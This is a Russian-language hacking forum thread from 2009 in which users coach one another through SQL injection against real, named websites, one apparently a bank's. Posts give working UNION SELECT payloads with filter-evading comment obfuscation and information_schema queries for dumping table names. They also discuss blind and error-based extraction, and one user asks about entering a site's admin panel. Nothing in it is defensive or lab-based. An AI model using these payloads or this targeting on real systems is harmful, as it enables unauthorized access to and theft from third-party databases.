
08.11.2009, 11:39
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами:
9204308
Репутация:
256
|
|
Сообщение от HAXTA4OK
Проще говоря у тебя Blind sql-inj (слепая скуля)
то есть sql-inj есть но без вывода
Есть там вывод...
Сообщение от warlok
а ты видиш принтабильное поле через которое можно вывести данные? мм кстате недавно в хакере писали про вывод данных через ошибки но если неошибась это прокатит только в 5 ветке
Можно и через ошибку...
|
|
|

08.11.2009, 01:44
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами:
10268804
Репутация:
208
|
|
mr.celt
а вот как насчет того, что все попытки SQL инекции - открывает стартовая страница?
Насчет XSS - негде проверять, т.к. поиск по сайту нету. единственно где нашел ввести данные - это где пишется письмо (оратный адрес)
|
|
|

08.11.2009, 01:48
|
|
Новичок
Регистрация: 07.11.2009
Сообщений: 23
С нами:
8688843
Репутация:
10
|
|
Сообщение от B1t.exe
mr.celt
а вот как насчет того, что все попытки SQL инекции - открывает стартовая страница?
Насчет XSS - негде проверять, т.к. поиск по сайту нету. единственно где нашел ввести данные - это где пишется письмо (оратный адрес)
пробуй:
id=-1/**/unION/**/selECT/**/1,2,3--+
И вообще, читай больше инфи
---
ксс может быть не только в поиске..
|
|
|

08.11.2009, 02:11
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами:
10268804
Репутация:
208
|
|
пробуй:
id=-1/**/unION/**/selECT/**/1,2,3--+
если пробовать вот так:
http://www.site.ru/ ?id=-1/**/unION/**/selECT/**/1,2,3--+
то открывает гравная страница (ничем не отличается от www.site.ru)
А если просто вот так:
http://www.site.ru/id=-1/**/unION/**/selECT/**/1,2,3--+
то кидает в сайт хостера, с надпесем:
Ошибка доступа 404 к указанной странице
Может тут какой то "супер" технология работает? или какой-то неприступный СУБД ?
|
|
|

08.11.2009, 02:14
|
|
Новичок
Регистрация: 07.11.2009
Сообщений: 23
С нами:
8688843
Репутация:
10
|
|
Сообщение от B1t.exe
если пробовать вот так:
http://www.site.ru/?id=-1/**/unION/**/selECT/**/1,2,3--+
то открывает гравная страница (ничем не отличается от www.site.ru)
А если просто вот так:
http://www.welcome-bank.ru/id=-1/**/unION/**/selECT/**/1,2,3--+
то кидает в сайт хостера, с надпесем:
Может тут какой то "супер" технология работает? или какой-то неприступный СУБД ?
блин, я даже не знаю как тебе объяснить
1) очень быстро перешел на такий сайты
2) читай мануалы!
Тебе в этой теме уже рассказали что читать и делать!
Последний раз редактировалось [Forest]; 08.11.2009 в 02:18..
|
|
|

08.11.2009, 04:14
|
|
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
С нами:
8829763
Репутация:
131
|
|
Делая запрос:
union+select+1,2,3,4,5,6,7,8,9,group_concat(table_ name),11+from+information_schema.tables
Выдаёт
что не так? 
Последний раз редактировалось DeluxeS; 08.11.2009 в 04:26..
|
|
|

08.11.2009, 08:45
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от DeluxeS
Делая запрос:
Выдаёт
что не так? 
union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3C42523 E,table_name),11+from+information_schema.tables+li mit+1,1
Не?
|
|
|

08.11.2009, 08:56
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
DeluxeS
ну скажем так штатный экстрасенс работает сейчас в разделе инклюдов... можно линк в студию?
и зачем тебе использовать здесь concat?
union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3C42523 E,table_name),11+from+information_schema.tables+li mit+1,1
или же делaй запрос без concat-a ... или же попробуй так
union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,tabl e_name,table_schema),11+from+information_schema.ta bles+li mit+1,1
Последний раз редактировалось Gorev; 08.11.2009 в 09:00..
|
|
|

08.11.2009, 08:19
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
vot posmotrite http://www.vashstile.ru/admin zdes kak to .htacces..
esli napisu login i parol pravilno moqu zayti v admin panel??
|
|
|

08.11.2009, 09:02
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
a moy vopros??
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|